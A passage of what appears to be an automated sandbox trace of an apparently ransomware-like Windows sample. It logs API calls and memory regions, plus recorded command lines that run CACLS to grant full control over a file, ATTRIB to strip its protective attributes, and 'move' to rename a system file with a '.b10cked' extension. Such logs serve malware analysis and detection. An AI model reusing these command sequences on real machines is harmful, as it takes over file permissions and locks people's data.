(_String1="FOR/?", _String2="CACLS") returned 3 [0150.298] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0150.298] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0150.298] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0150.298] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0150.301] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0150.301] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0150.302] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0150.302] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0150.302] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0150.302] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0150.302] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0150.305] SetErrorMode (uMode=0x0) returned 0x0 [0150.305] SetErrorMode (uMode=0x1) returned 0x0 [0150.305] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x322018, lpFilePart=0x26f054 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f054*="Desktop") returned 0x18 [0150.305] SetErrorMode (uMode=0x0) returned 0x1 [0150.305] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.305] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0150.309] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.310] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffff [0150.310] GetLastError () returned 0x2 [0150.310] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffff [0150.310] GetLastError () returned 0x2 [0150.310] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0x310f60 [0150.310] FindClose (in: hFindFile=0x310f60 | out: hFindFile=0x310f60) returned 1 [0150.311] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffff [0150.311] GetLastError () returned 0x2 [0150.311] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0x310f60 [0150.311] FindClose (in: hFindFile=0x310f60 | out: hFindFile=0x310f60) returned 1 [0150.311] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0150.311] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0150.311] GetConsoleTitleW (in: lpConsoleTitle=0x26f2c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.311] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f150, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f218 | out: lpAttributeList=0x26f150, lpSize=0x26f218) returned 1 [0150.311] UpdateProcThreadAttribute (in: lpAttributeList=0x26f150, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f210, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f150, lpPreviousValue=0x0) returned 1 [0150.311] GetStartupInfoW (in: lpStartupInfo=0x26f10c | out: lpStartupInfo=0x26f10c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0150.311] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0150.312] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26f1ac*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f1f8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x26f1f8*(hProcess=0x50, hThread=0x4c, dwProcessId=0x6d8, dwThreadId=0xcd4)) returned 1 [0150.315] CloseHandle (hObject=0x4c) returned 1 [0150.315] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0150.315] GetEnvironmentStringsW () returned 0x3204e0* [0150.315] FreeEnvironmentStringsW (penv=0x3204e0) returned 1 [0150.315] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0150.429] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26f0ec | out: lpExitCode=0x26f0ec*=0x0) returned 1 [0150.429] CloseHandle (hObject=0x50) returned 1 [0150.429] _vsnwprintf (in: _Buffer=0x26f234, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f0f8 | out: _Buffer="00000000") returned 8 [0150.429] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0150.429] GetEnvironmentStringsW () returned 0x322310* [0150.429] FreeEnvironmentStringsW (penv=0x322310) returned 1 [0150.429] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0150.429] GetEnvironmentStringsW () returned 0x322310* [0150.429] FreeEnvironmentStringsW (penv=0x322310) returned 1 [0150.429] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f150 | out: lpAttributeList=0x26f150) [0150.429] GetConsoleTitleW (in: lpConsoleTitle=0x26f534, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.430] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.430] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0150.430] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.430] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffff [0150.430] GetLastError () returned 0x2 [0150.430] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffff [0150.430] GetLastError () returned 0x2 [0150.430] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0x31e540 [0150.430] FindClose (in: hFindFile=0x31e540 | out: hFindFile=0x31e540) returned 1 [0150.430] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffff [0150.431] GetLastError () returned 0x2 [0150.431] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0x31e540 [0150.431] FindClose (in: hFindFile=0x31e540 | out: hFindFile=0x31e540) returned 1 [0150.431] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0150.431] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0150.431] GetConsoleTitleW (in: lpConsoleTitle=0x26f2c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.431] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f150, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f218 | out: lpAttributeList=0x26f150, lpSize=0x26f218) returned 1 [0150.431] UpdateProcThreadAttribute (in: lpAttributeList=0x26f150, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f210, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f150, lpPreviousValue=0x0) returned 1 [0150.431] GetStartupInfoW (in: lpStartupInfo=0x26f10c | out: lpStartupInfo=0x26f10c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0150.431] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0150.431] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26f1ac*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f1f8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"", lpProcessInformation=0x26f1f8*(hProcess=0x4c, hThread=0x50, dwProcessId=0x678, dwThreadId=0xbd0)) returned 1 [0150.433] CloseHandle (hObject=0x50) returned 1 [0150.433] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0150.433] GetEnvironmentStringsW () returned 0x322470* [0150.433] FreeEnvironmentStringsW (penv=0x322470) returned 1 [0150.433] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0150.517] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x26f0ec | out: lpExitCode=0x26f0ec*=0x0) returned 1 [0150.517] CloseHandle (hObject=0x4c) returned 1 [0150.517] _vsnwprintf (in: _Buffer=0x26f234, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f0f8 | out: _Buffer="00000000") returned 8 [0150.518] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0150.518] GetEnvironmentStringsW () returned 0x322470* [0150.518] FreeEnvironmentStringsW (penv=0x322470) returned 1 [0150.518] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0150.518] GetEnvironmentStringsW () returned 0x322470* [0150.518] FreeEnvironmentStringsW (penv=0x322470) returned 1 [0150.518] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f150 | out: lpAttributeList=0x26f150) [0150.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.518] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.518] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0150.518] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.518] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0150.519] SetConsoleInputExeNameW () returned 0x1 [0150.519] GetConsoleOutputCP () returned 0x1b5 [0150.519] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.519] SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.519] exit (_Code=0) Process: id = "236" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea168c0" os_pid = "0x6d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "235" os_parent_pid = "0x170" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19583 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19584 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19585 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19586 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 19587 start_va = 0x8d0000 end_va = 0x8d8fff entry_point = 0x8d0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 19588 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19589 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19590 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19591 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 19592 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19593 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19594 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19595 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19596 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 19597 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 19598 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19599 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19600 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19601 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19602 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19603 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19604 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 298 os_tid = 0xcd4 Thread: id = 299 os_tid = 0xbcc Process: id = "237" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea168c0" os_pid = "0x678" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "235" os_parent_pid = "0x170" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19702 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19703 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19704 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19705 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 19706 start_va = 0xeb0000 end_va = 0xeb6fff entry_point = 0xeb0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 19707 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19708 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19709 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19710 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 19711 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19712 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19713 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19714 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19715 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 19716 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 19717 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 19718 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19719 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19720 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19721 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19722 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19723 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19724 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19725 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19726 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19727 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19728 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19729 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 19730 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19731 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 300 os_tid = 0xbd0 Process: id = "238" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167a0" os_pid = "0xcdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19746 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19747 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19748 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19749 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 19750 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 19751 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19752 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19753 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19754 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 19755 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19829 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19830 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 